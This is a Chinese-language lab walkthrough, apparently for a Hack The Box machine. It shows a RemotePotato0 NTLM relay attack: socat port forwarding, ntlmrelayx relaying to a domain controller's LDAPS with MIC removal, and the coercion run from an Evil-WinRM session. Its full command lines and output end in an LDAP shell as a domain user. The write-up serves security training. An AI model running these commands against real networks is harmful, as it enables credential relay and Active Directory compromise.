RemotePotato0
1. 利用条件
有一个在线的高权限用户,
它利用 DCOM 激活服务,触发目标机器上当前登录的任何用户的 NTLM 认证
2. 利用方式1
2.1.1. socat端口转发
用socat转发我们tun0的135端口流量到 WEB01 的 9999 端口 :
这里的监听端口不能用其他端口,因为DCOM 客户端做 OXID 解析时只认 135 端口
┌──(root㉿kali)-[~/Desktop/htb/Pirate]
└─# socat TCP-LISTEN:135,bind=10.10.14.10,fork,reuseaddr TCP:192.168.100.2:9999
2.1.2. ntlmrelayx
用ntlmrelayx开启监听,把收到的NTLM认证转发到DC01的LDAPS
┌──(root㉿kali)-[~/Desktop/htb/Pirate] └─# nxc smb 10.129.124.28 -u guest -p '' SMB 10.129.124.28 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:None) (Null Auth:True) SMB 10.129.124.28 445 DC01 [-] pirate.htb\guest: STATUS_ACCOUNT_DISABLED ┌──(root㉿kali)-[~/Desktop/htb/Pirate] └─# nxc ldap 10.129.124.28 -u guest -p '' LDAP 10.129.124.28 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb) (signing:None) (channel binding:Never) LDAP 10.129.124.28 389 DC01 [-] pirate.htb\guest: STATUS_ACCOUNT_DISABLED
- 因为域控DC01 开启了SMB签名,所以无法使用SMB协议中继,未开启LDAP通道绑定,这里可以使用LDAPS 或者LDAP中继
- 这里还可以选择其他协议,如HTTP、HTTPS、MSSQL之类的,但都需要对应的服务配置了Windows认证(NTLM/Negotiate)才行
- 但后续我们会利用a.white的Ldap shell修改 a.white.adm的密码,AD要求此操作只能在加密通道上执行才行,所以这里选择LDAPS
┌──(root㉿kali)-[~/Desktop/htb/Pirate]
└─# ntlmrelayx.py -t ldaps://10.129.124.28 --remove-mic --http-port 80 -smb2support --no-da --no-acl --no-validate-privs -i
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client WINRMS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMTP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Setting up WinRM (HTTP) Server on port 5985
[*] Setting up WinRMS (HTTPS) Server on port 5986
[*] Setting up RPC Server on port 135
Exception in thread Thread-7:
Traceback (most recent call last):
File "/root/.local/share/uv/python/cpython-3.11.13-linux-x86_64-gnu/lib/python3.11/threading.py", line 1045, in _bootstrap_inner
self.run()
File "/root/.local/share/uv/tools/impacket/lib/python3.11/site-packages/impacket/examples/ntlmrelayx/servers/rpcrelayserver.py", line 424, in run
self.server = self.RPCSocketServer((self.config.interfaceIp, self.config.listeningPort), self.RPCHandler,
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/root/.local/share/uv/tools/impacket/lib/python3.11/site-packages/impacket/examples/ntlmrelayx/servers/rpcrelayserver.py", line 41, in __init__
socketserver.TCPServer.__init__(self, server_address, RequestHandlerClass)
File "/root/.local/share/uv/python/cpython-3.11.13-linux-x86_64-gnu/lib/python3.11/socketserver.py", line 456, in __init__
self.server_bind()
File "/root/.local/share/uv/python/cpython-3.11.13-linux-x86_64-gnu/lib/python3.11/socketserver.py", line 472, in server_bind
self.socket.bind(self.server_address)
OSError: [Errno 98] Address already in use
[*] Multirelay disabled
[*] Servers started, waiting for connections
这里报错不用管
- -t ldaps://10.129.124.28 : 目标IP+协议
- --remove-mic:移除 NTLM 校验,用于绕过NTLM中继防护
- --http-port 80: 监听本地80 因为目标为HTTP服务的NTLM认证
- --no-da:不自动添加域管 减少噪音
- --no-acl:不修改 ACL 减少噪音
- --no-validate-privs :不验证权限 减少噪音
- -i:启用ldap shell
2.1.3. RemotePotato0 触发NTLM强制认证
*Evil-WinRM* PS C:\Users\gMSA_ADFS_prod$.PIRATE\Documents> ./RemotePotato0.exe -m 0 -r 10.10.14.10 -x 10.10.14.10 -p 9999
[*] Detected a Windows Server version not compatible with JuicyPotato. RogueOxidResolver must be run remotely. Remember to forward tcp port 135 on 10.10.14.10 to your victim machine on port 9999
[*] Example Network redirector:
sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:{{ThisMachineIp}}:9999
[*] Starting the NTLM relay attack, launch ntlmrelayx on 10.10.14.10!!
[*] Calling CoGetInstanceFromIStorage with CLSID:{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
[*] RPC relay server listening on port 9997 ...
[*] Starting RogueOxidResolver RPC Server listening on port 9999 ...
[*] IStoragetrigger written: 104 bytes
[*] ResolveOxid2 RPC call
[+] Received the relayed authentication on the RPC relay server on port 9997
[*] Connected to ntlmrelayx HTTP Server 10.10.14.10 on port 80
[*] Connected to RPC Server 127.0.0.1 on port 9999
[+] Got NTLM type 3 AUTH message from PIRATE\a.white with hostname WEB01
[+] Relaying seems successfull, check ntlmrelayx output!
- -m 0:Rpc2Http cross protocol relay server + potato trigger模式,最常用的
- -r 10.10.14.10: 远程中继服务器IP
- -x 10.10.14.10: 恶意 OXID 解析器 IP
- -p 9999:OXID 解析器端口
此时,我的ntlmrelayx也收到了回复
OSError: [Errno 98] Address already in use
[*] (HTTP): Client requested path: /
[*] (HTTP): Connection from 10.129.124.28 controlled, attacking target ldaps://10.129.124.28
[*] (HTTP): Client requested path: /
[*] (HTTP): Authenticating connection from PIRATE/A.WHITE@10.129.124.28 against ldaps://10.129.124.28 SUCCEED [1]
[*] ldaps://PIRATE/A.WHITE@10.129.124.28 [1] -> Started interactive Ldap shell via TCP on 127.0.0.1:11000 as PIRATE/A.WHITE
此时会在127.0.0.1:11000 开启一个一次性的ldap shell